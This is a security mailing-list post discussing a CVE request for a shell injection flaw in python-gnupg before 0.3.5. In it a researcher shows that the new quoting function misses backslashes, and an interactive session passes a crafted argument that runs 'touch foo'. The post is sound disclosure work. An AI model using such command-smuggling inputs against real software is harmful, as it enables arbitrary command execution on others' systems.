Date: Tue, 4 Feb 2014 23:27:34 +1300 From: Matthew Daley <mattd@...fuzz.com> To: oss-security@...ts.openwall.com Subject: Re: CVE request: python-gnupg before 0.3.5 shell injection On Tue, Feb 4, 2014 at 11:04 PM, Henri Salo <henri@...v.fi> wrote: > On Tue, Feb 04, 2014 at 10:35:46AM +0100, Hanno Böck wrote: >> python-gnupg 0.3.5 lists in the changelog: >> "Added improved shell quoting to guard against shell injection." >> >> Sounds like a severe security issue, but further info is lacking. > > Diff attached. New function shell_quote() seems to represent major changes to > shell input quoting against unsafe input. > [...] This appears to (at least) miss escaping of backslashes: $ ls foo ls: cannot access foo: No such file or directory $ python Python 2.7.6 (default, Jan 11 2014, 14:34:26) [GCC 4.8.2] on linux2 Type "help", "copyright", "credits" or "license" for more information. >>> import gnupg >>> gnupg.GPG().sign_file(open("/dev/null"), "'\\\"; touch foo #'") <gnupg.Sign object at 0x7fb3dbfad7d0> >>> $ ls foo foo - Matthew
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.